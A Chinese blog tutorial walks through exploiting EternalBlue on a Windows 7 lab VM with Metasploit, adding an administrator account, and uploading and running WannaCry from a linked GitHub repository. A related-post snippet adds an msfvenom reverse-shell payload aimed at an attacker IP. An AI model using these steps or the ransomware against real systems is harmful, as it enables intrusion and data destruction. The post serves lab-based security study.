Windows 7 靶机操作 永恒之蓝复刻

已于 2024-12-12 11:11:14 修改
阅读量965 收藏 7
点赞数 6
分类专栏: 渗透测试 文章标签: 安全 网络安全
于 2024-10-16 11:01:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chidaoqiannianzq/article/details/142974996
版权

我们使用kali Linux对Windows 7进行永恒之蓝测试

首先查看Windows7 的靶机地址

紧接着我们开启msfconsole渗透测试框架

由于我们已经之前先预定Windows7主机开启了远程登录和445端口等

此时我们可以直接搜索msf的MS17-010漏洞模块

设置set rhosts 192.168.X.X 靶机地址之后可以开启攻击

我们可以看到攻击成功,之后开启提权操作

第一步   创建一个用户

将创建好的用户拉进超级管理组

net localgroup Administrators test01 /add

net localgroup Administrators

可以看到已经成功提权进本地管理员组了。

使用远程桌面可以连接

wannacry的病毒测试

下面的链接可以下载到wannacry勒索病毒

https://github.com/limiteci/WannaCry

下载之后可以放置到我们卡里虚拟机指定位置

我这边放置到kali 、root根目录下方

然后我们上传漏洞到Windows7

upload /root/WannaCry.EXE

查看上传路径:

pwd

之后我们可以远程执行病毒程序

execute -f WannaCry.EXE

查看进程

ps -ef | grep WannaCry.EXE

回到Windows 7 可以看到Window 已经中毒

MSF之漏洞复现
mackilo的博客
11-08 8629
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。
win7虚拟机永恒之蓝漏洞复现
xxxpnb的博客
01-15 578
web安全菜鸟一枚
利用kali对win7靶机进行蓝屏攻击(超详细保姆级手把手教会)
最新发布
2301_79619682的博客
03-26 1367
MS12-020漏洞全称为Microsoft Windows远程桌面协议RDP远程代码执行漏洞。该漏洞是由于Windows在处理某些对象时存在错误,攻击者可以通过特制的RDP报文访问未初始化或已删除的对象,从而导致任意代码执行。漏洞影响的系统包括Windows XP、Windows Server 2003,以及未开启网络层认证的Windows Vista、Windows Server 2008和Windows 7等。
win7永恒之蓝微软官方补丁
05-16
没打补丁的赶紧打,网上的关闭端口方法我都试了,关不掉
win7永恒之蓝
m0_58596609的博客
11-15 2303
一 使用msfconsole命令开启MSF,并使用search命令搜索永恒之蓝模块 search ms17-010 二 :使用搜索出来的第三个模块来进行探测目标是否存在永恒之蓝漏洞,并设置好以下参数进行扫描测试 >>>use auxiliary/scanner/smb/smb_ms17_010 /模块调用或者使用use 3对搜索出来的模块进行调用. >>>set rhost 192.168.202.131 //设置目标地址 >>&gt...
Windows7永恒之蓝(ms17_010)
2401_87269293的博客
12-19 309
windows版的metasploit也可以对永恒之蓝进行攻击,但是回弹meterpreter后容易出现获取不了shell的情况,建议在linux下使用。Windows7靶机IP:192.168.144.145。运行后回弹meterpreter就代表成功了。445端口open,说明存在永恒之蓝漏洞。注意选择使用exploit的永恒之蓝模块。
kali Linux——永恒之蓝复刻
sparkleqs的博客
05-16 3310
Metasploit Framework 是一个功能强大的开源安全漏洞检测工具,用于编写、测试和使用 exploit 代码,广泛应用于渗透测试、shellcode 编写和漏洞研究。该框架主要采用面向对象的 Ruby 编程语言编写,并包含由 C 语言、汇编语言和 Python 编写的可选组件。最初的 Metasploit 是用 Perl 编写的,但在后来的版本中改为使用 Ruby 编写。
永恒之蓝复现-附带win7虚拟机安装教程
dangejinghong的博客
09-03 2462
以上就是我对永恒之蓝的复现MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法_RDrug的博客-优快云博客MS17-010漏洞复现(带win7虚拟机安装,零基础)永恒之蓝镜像墨言ink的博客-优快云博客从大佬的博客中学到很多,也对这个漏洞更加了解。
永恒之蓝配置Windows7
10-24
Windows7 是一种广泛使用的操作系统,但它也存在一些漏洞,例如永恒之蓝漏洞(MS17-010)。本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前...
永恒之蓝漏洞复现
qq_61024461的博客
07-17 331
永恒之蓝漏洞复现
Win7经典漏洞永恒之蓝复现
qq_42808240的博客
10-20 3079
win7经典漏洞永恒之蓝的漏洞利用
kali永恒之蓝
Ryongao
01-15 590
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
永恒之蓝复现
xdjxi的博客
03-07 430
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议? SM...
(菜鸟自学)搭建虚拟渗透实验室——安装Windows 7 靶机
nbdlsplyb的博客
01-14 3901
依次点击“开始”》“控制面板”》“网络和Internet”》“网络和共享中心”》“更改适配器设置”》右击“本地连接”,单击属性》点击“IPv4”》配置相应的IP地址、掩码、网关。点击“下一步”》勾选“我接受许可条款”,点击“下一步”》点击“自定义”,随即点击“下一步”,将开始进行安装,此过程缓慢,请耐心等待,待安装完毕系统将自动进行重启。加载VMware Tools的安装程序,运行该安装程序并选用“典型安装”,安装完成将会提示重启,重启之后将生效。新建一台虚拟机,并选择Windows 7系统。
永恒之蓝靶场
m0_46412408的博客
08-13 2177
模拟永恒之蓝攻击过程的话,需要win7靶机)处于登录状态,来获取用户名和密码从而达到远程控制的目的,模拟hack已经打入内网与靶机处于同一网段(所以用ipcongfig来查看网关信息)输入run/exploit执行攻击(这个过程需要多等一会儿,如果这里出现问题去看看靶机的防火墙是不是开启了,把防火墙关闭再运行一下就好了)address 192.168.1.53 //配置eth0的固定IP地址,网段要和物理机的一样,且此IP未被使用。设置攻击主机的ip地址,显示配置信息。............
永恒之蓝(ms17-010)复现对win7win server2008 R2渗透
Lzcsfg的博客
04-10 2203
在虚拟机中安装关闭win7win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
win7 环境靶机_dvwa靶机搭建
weixin_36056010的博客
01-16 2801
Win7虚拟机环境中 Dvwa 靶机环境搭建准备环节1.Vmware workstation pro + win7 iso2.phpStudy201611033.DVWA-master环境搭建Win7环境搭建 win7主机网卡模式选择为nat模式。安装完虚拟机后,在虚拟机内 打开phpstudy 并启动其他选项菜单-网站根目录进入 C:\phpstudy\WWW 目录下新增dvwa文件夹将DVW...
win7永恒之蓝复现(一)
qq_63831588的博客
06-12 1689
今天来记录一下我的第一个漏洞学习,win7永恒之蓝漏洞的心路历程,我会分享我学习的过程,以及我学习过程中遇到的问题,并且附上相应的解决方法,大家一起学习一起进步!我们来分析一下,首先由于永恒之蓝是基于445端口的,这里我们可以看到445是开放的(这是基本条件,如果没有开放我们要手动开放一下,不过445一般是默认开放的),其次我们可以看到下面扫到了ms17-010(永恒之蓝的漏洞代号)这个漏洞,这就说明我们的win7中有这个漏洞,我们可以进行复现!
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问网站。 3. 在网站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

antique toy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值